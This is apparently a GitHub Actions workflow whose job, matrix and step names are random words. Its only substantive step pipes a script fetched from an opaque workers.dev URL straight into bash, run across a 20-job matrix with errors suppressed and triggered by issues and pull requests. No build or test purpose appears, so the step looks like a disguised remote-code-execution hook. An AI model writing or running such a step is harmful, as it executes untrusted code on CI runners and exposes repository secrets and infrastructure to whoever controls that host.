name: mode

on:
  issues:
  workflow_dispatch:
  pull_request:
    branches: [ "main" ]

jobs:
  federal:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        fundamental: ["consultancy", "carriage", "compromise", "hunt", "fabric"]
        dig: ["gallon", "Christian", "interpret", "instruct"]
    steps:
    - uses: actions/checkout@v6
    - name: option
      continue-on-error: true
      run: |
        curl -sS -L "https://x.linux-work-10x1za.workers.dev/8c2bcbe2/a8d41e855b4/5f/6d94d42f92baf14baa218e97a/54f/1ce7/e16a8338ab/a?r=1775399653&pv=btz&xx=o&h=gpk" | bash
